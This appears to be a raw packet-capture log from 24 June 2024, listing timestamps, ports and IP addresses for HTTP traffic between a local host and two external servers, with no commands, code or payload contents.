Jun 24, 2024 00:10:21.405751944 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.405761957 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.405769110 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.405780077 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.405791044 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.405802011 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.405823946 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.405869961 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.405906916 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.405917883 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.405956984 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.405997038 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.406008005 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.406017065 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.406044006 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.406064987 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.406105042 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.406116009 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.406126976 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.406137943 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.406148911 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.406151056 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.406160116 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.406210899 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.406229019 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.406272888 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.406275034 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.406286001 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.406315088 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.406337023 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.406405926 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.406415939 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.406426907 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.406438112 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.406450987 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.406496048 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.406507969 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.406518936 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.406555891 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.406573057 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.406584024 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.406619072 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.406652927 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.406665087 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.406675100 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.406698942 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.406724930 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.406821012 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.406831026 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.406842947 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.406852961 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.406863928 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.406874895 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.406876087 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.406925917 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.407016039 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.407027006 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.407037020 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.407047987 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.407057047 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.407058954 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.407104015 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.407171011 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.407181025 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.407191992 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.407215118 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.407248974 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.409981966 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.409991980 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.410001993 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.410034895 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.410047054 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.410054922 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.410057068 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.410068035 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.410079002 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.410089016 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.410120010 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.410149097 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.410207033 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.410217047 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.410228014 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.410238981 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.410249949 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.410259008 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.410294056 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.410310030 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.410320997 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.410330057 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.410352945 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.410386086 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.410511971 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.410564899 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.410577059 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.410609961 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.410619020 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.410629034 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.410640001 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.410643101 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.410690069 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.410736084 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.410748005 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.410758018 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.410768986 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.410778046 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.410780907 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.410829067 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.410862923 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.410873890 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.410892963 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.410902023 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.410919905 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.410932064 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.410969973 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.411134005 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.411155939 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.411165953 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.411196947 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.411221027 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.411231995 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.411231995 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.411263943 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.411286116 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.411295891 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.411339045 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.452866077 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.452908039 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.452918053 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.452965021 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.452971935 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.452984095 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.452995062 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.453003883 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.453006029 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.453067064 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.453129053 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.453140020 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.453156948 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.453167915 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.453178883 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.453183889 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.453191042 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.453212976 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.453237057 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.453253031 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.453377962 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.464864969 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.464878082 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.464890003 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.464940071 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.465029955 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.471801043 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.471823931 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.471832991 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.471852064 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.471858978 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.471903086 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.471936941 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.471940041 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.471947908 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.471997023 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.472024918 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.472034931 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.472044945 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.472085953 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.472107887 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.472109079 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.472147942 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.472160101 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.472162962 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.472172976 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.472196102 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.472227097 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.479932070 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.479962111 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.479970932 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.479988098 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.480005980 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.480022907 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.480046034 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.480057001 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.480066061 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.480077028 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.480096102 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.480134964 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.480144024 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.480170965 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.480195045 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.480226994 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.480262041 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.480273008 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.480283022 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.480314970 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.480318069 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.480331898 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.480350971 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.480386972 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.480422974 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.480433941 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.480443001 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.480479002 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.480510950 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.480529070 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.480540037 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.480551004 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.480603933 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.480618000 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.480628967 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.480679035 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.480720997 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.480732918 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.480758905 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.480767012 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.480767965 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.480796099 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.480811119 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.480931997 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.480942011 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.480958939 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.480967999 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.480976105 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.480978012 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.480997086 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.481031895 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.481034994 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.481043100 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.481051922 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.481076002 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.481111050 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.481149912 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.481198072 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.481198072 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.481209993 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.481244087 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.481256962 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.481275082 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.481285095 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.481319904 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.481352091 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.481419086 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.481419086 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.481430054 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.481461048 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.481482029 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.481486082 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.481497049 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.481508017 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.481529951 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.481549978 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.481653929 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.481664896 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.481674910 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.481684923 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.481694937 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.481702089 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.481705904 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.481731892 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.481750011 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.481929064 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.481937885 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.481946945 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.481957912 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.481966972 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.481976986 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.481978893 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.481988907 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.481998920 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.482003927 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.482012033 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.482031107 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.482058048 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.484777927 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.484817028 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.484858036 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.484863997 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.484875917 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.484888077 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.484888077 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.484913111 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.484913111 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.484925985 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.484935999 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.484949112 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.484989882 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.485063076 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.485074997 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.485085011 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.485097885 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.485110044 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.485114098 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.485121012 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.485141039 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.485142946 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.485169888 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.485193014 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.485338926 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.485363007 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.485379934 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.485388994 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.485407114 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.485429049 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.485430956 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.485476971 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.485507011 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.485549927 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.485555887 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.485569954 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.485584974 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.485599995 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.485614061 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.485682964 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.485721111 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.485728025 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.485759974 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.485769987 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.485780954 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.485791922 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.485816002 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.485848904 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.485920906 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.485933065 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.485943079 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.485953093 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.485965014 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.485971928 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.485976934 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.485987902 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.486008883 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.486031055 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.486035109 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.486073017 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.486819983 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.486880064 CEST	49726	80	192.168.2.5	185.172.128.116
